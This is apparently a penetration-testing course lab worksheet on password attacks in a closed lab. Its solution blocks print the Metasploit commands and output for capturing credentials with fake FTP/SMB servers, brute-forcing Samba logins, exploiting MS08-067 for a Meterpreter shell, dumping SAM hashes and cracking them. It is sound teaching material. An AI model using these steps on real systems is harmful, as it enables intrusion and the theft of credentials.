Accounts and Passwords

Exercise 1: Capture a Password

In this exercise, you’ll explore the different methods Metasploit has at its disposal to collect passwords from users that can be tricked into accessing a service you control.

Task 1.1

Verify that PostgreSQL server is running…

root@bah-pod1-kali:~# systemctl status postgresql
postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disab
   Active: active (exited) since Fri 2016-09-30 15:40:39 UTC; 2min 30s ago
  Process: 3452 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
 Main PID: 3452 (code=exited, status=0/SUCCESS)

Sep 30 15:40:39 bah-pod1-kali systemd[1]: Starting PostgreSQL RDBMS...
Sep 30 15:40:39 bah-pod1-kali systemd[1]: Started PostgreSQL RDBMS.

Task 1.2

Open Metasploit msfconsole.

msfconsole

Task 1.3

Using tab completion, find out what services Metasploit can emulate from: use auxiliary/server/ and use auxiliary/server/capture/

msf > use auxiliary/server/[TAB]
use auxiliary/server/android_browsable_msf_launch
use auxiliary/server/android_mercury_parseuri
use auxiliary/server/browser_autopwn
...

Task 1.4

Set up an FTP password capture session using Metasploit. Log into this session from Windows Command Prompt with ftp 192.168.1.2
- Observe the msfconsole window while doing this

Task 1.5

Kill the FTP background job. Try jobs -h

Bonus 1

Try the SMB capture utility while accessing from Windows!

Start → Run… → \\kali.seccon.ninja
How is SMB different in the way it handles its passwords? Did you have to log in first before credentials were shared with Metasploit?

Bonus 2

Suggest a way these utilities could be used with IP routing/ARP poisoning attacks you learned in Module 4.

Exercise 2: Brute-Force a Samba Password with Metasploit

Metasploitable2 has accounts with easily guessable passwords. Enumerate the accounts and guess the passwords using Metasploit. Wordlists can be found in /usr/share/wordlists. Make sure db_status shows the following:

msf > db_status
[*] postgresql connected to msf3

Task 2.1

Enumerate the users on metasploitable using the auxiliary/scanner/smb/smb_enumusers plugin.

Click here for a cheat...

msf > use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf auxiliary(smb_enumusers) > run

[*] 192.168.1.3 METASPLOITABLE [ games, nobody, bind, proxy, syslog, user, www-data, root, news, postgres, bin, mail, distccd, proftpd, dhcp, daemon, sshd, man, lp, mysql, gnats, libuuid, backup, msfadmin, telnetd, sys, klog, postfix, service, list, irc, ftp, tomcat55, sync, uucp ] ( LockoutTries=0 PasswordMin=5 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Task 2.2

Use the SMB Login Check Scanner to brute force into Samba. Try the username as the password for all users. Use the seccon.txt wordlist

Click here for a hint...

To reduce the amount of work you have to do, only attempt to brute-force the following accounts:

msfadmin
user
postgres
sys
klog
service

Click here for a cheat...

seccon@seccon-kali1:~/labs/08-accounts$ cat users
msfadmin
user
postgres
sys
klog
service

seccon@seccon-kali1:~/labs/08-accounts$ sudo msfconsole
...
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf auxiliary(smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf auxiliary(smb_login) > set PASS_FILE /usr/share/wordlists/seccon.txt
PASS_FILE => /usr/share/wordlists/seccon.txt
msf auxiliary(smb_login) > set USER_FILE users
USER_FILE => users
msf auxiliary(smb_login) > run

Task 2.3

View the captured credentials in the database. What is the password for sys account?

Bonus

Using the results from your active recon and information about services in the database, figure out an alternate way to log into metasploitable not involving Samba

Exercise 3: Crack An NTLM-hashed Password

Task 3.1

Using the MS08-067 vulnerability, exploit and setup a Meterpreter session with windows

Click here for a hint...

Try using the search command:

msf > search ms08_067

Matching Modules
================

    Name                                 Disclosure Date          Rank   Description
    ----                                 ---------------          ----   -----------
    exploit/windows/smb/ms08_067_netapi  2008-10-28 00:00:00 UTC  great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

Click here for a cheat...

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST windows
RHOST => windows
msf exploit(ms08_067_netapi) > run

[*] Started reverse handler on 192.168.1.2:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769536 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.4:1052) at 2014-11-21 18:15:20 -0800

meterpreter >

Task 3.2

Display the hashes out of SAM. Suspend the Meterpreter session to the background

You can display your current background sessions with the session command

Click here for a cheat...

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4:::
seccon:1003:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
user:1004:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::

meterpreter > background

[*] Backgrounding session 1...

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

    Id  Type                   Information                    Connection
    --  ----                   -----------                    ----------
    1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WINDOWS  192.168.1.2:4444 -> 192.168.1.4:1054 (192.168.1.4)

msf exploit(ms08_067_netapi) >

Task 3.3

Dump the hashes out of SAM with the post/windows/gather/smart_hashdump utility

The hash file in JtR format should show up in loot

Click here for a cheat...

msf exploit(ms08_067_netapi) > use post/windows/gather/smart_hashdump

msf post(smart_hashdump) > sessions -l

Active sessions
===============

Id  Type                   Information                    Connection
--  ----                   -----------                    ----------
1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WINDOWS  192.168.1.2:4444 -> 192.168.1.4:1054 (192.168.1.4)

msf post(smart_hashdump) > set SESSION 1

SESSION => 1

msf post(smart_hashdump) > run

[*] Running module against WINDOWS
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20141121182250_default_192.168.1.4_windows.hashes_123878.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 26a1ab029cc81f35c920f4e2409cc7e5...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[+]     seccon:"seccon!"
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     HelpAssistant:1000:4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
[+]     seccon:1003:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
[+]     user:1004:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
[*] Post module execution completed

msf post(smart_hashdump) > loot

Loot
====

host         service  type            name                content     info            path
----         -------  ----            ----                -------     ----            ----
192.168.1.4           windows.hashes  WINDOWS_hashes.txt  text/plain  Windows Hashes  /root/.msf4/loot/20141121182250_default_192.168.1.4_windows.hashes_123878.txt

Task 3.4

Crack the NTLM hashes out of SAM with the auxiliary/analyze/jtr_crack_fast utility

Click here for a cheat...

msf post(smart_hashdump) > use auxiliary/analyze/jtr_crack_fast
msf auxiliary(jtr_crack_fast) > run

[*] Seeded the password database with 19 words...
fopen: /opt/metasploit/apps/pro/msf3/data/john/run.linux.x86.sse2/password.lst: No such file or directory
[*] Output: Loaded 7 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
fopen: /opt/metasploit/apps/pro/msf3/data/john/run.linux.x86.sse2/password.lst: No such file or directory
[*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
guesses: 0  time: 0:00:00:04 DONE (Fri Nov 21 18:25:00 2014)  c/s: 5462K  trying: ZEB1900 - ZZZ1900
[*] Output: Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 0  time: 0:00:00:06 DONE (Fri Nov 21 18:25:06 2014)  c/s: 25643K  trying: ||V} - |||}
[*] Output: Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
guesses: 0  time: 0:00:00:00 DONE (Fri Nov 21 18:25:07 2014)  c/s: 1307K  trying: 89093 - 89092
[*] Output: Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
[*] cred_18:PASSWORD:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
[*] cred_17:SECCON!:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
[*] cred_16::aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
[*] cred_14::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*]
[*] 5 password hashes cracked, 2 left
guesses: 0  time: 0:00:00:12 DONE (Fri Nov 21 18:25:19 2014)  c/s: 10921K  trying: zydeco1900 - seccon!1900
[*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
guesses: 0  time: 0:00:00:05 DONE (Fri Nov 21 18:25:24 2014)  c/s: 32030K  trying: |||}
[*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
guesses: 0  time: 0:00:00:00 DONE (Fri Nov 21 18:25:24 2014)  c/s: 1709K  trying: 89030 - 89092
[*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
[*] cred_18:PASSWORD:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
[*] cred_17:seccon!:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
[*] cred_14::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*]
[*] 3 password hashes cracked, 2 left
[+] Cracked: user:PASSWORD (192.168.1.4:445)
[+] Cracked: seccon:seccon! (192.168.1.4:445)
[+] Cracked: Administrator: (192.168.1.4:445)
[*] Auxiliary module execution completed

msf auxiliary(jtr_crack_fast) > creds windows

Credentials
===========

host         port  user              pass                                                               type      proof  active?
----         ----  ----              ----                                                               ----      -----  -------
192.168.1.4  445   user              e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687  smb_hash         true
192.168.1.4  445   seccon            e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827  smb_hash         true
192.168.1.4  445   SUPPORT_388945a0  aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100  smb_hash         true
192.168.1.4  445   HelpAssistant     4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4  smb_hash         true
192.168.1.4  445   Administrator     aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0  smb_hash         true
192.168.1.4  445   Administrator                                                                        password         true
192.168.1.4  445   seccon            seccon!                                                            password         true
192.168.1.4  445   user              PASSWORD                                                           password         true

Exercise 4: Crack Me If You Can!!!

Task 4.1

KoreLogic throws a yearly contest held at DefCon called Crack Me If You Can. Your VM has the contest from 2011. Using John the Ripper and HashCat, try to crack as many passwords as you can.

Bonus

Unzip KoreLogic-2011-CrackMeIfYouCan-tree.zip. Using John the Ripper and HashCat, try to crack as many passwords as you can.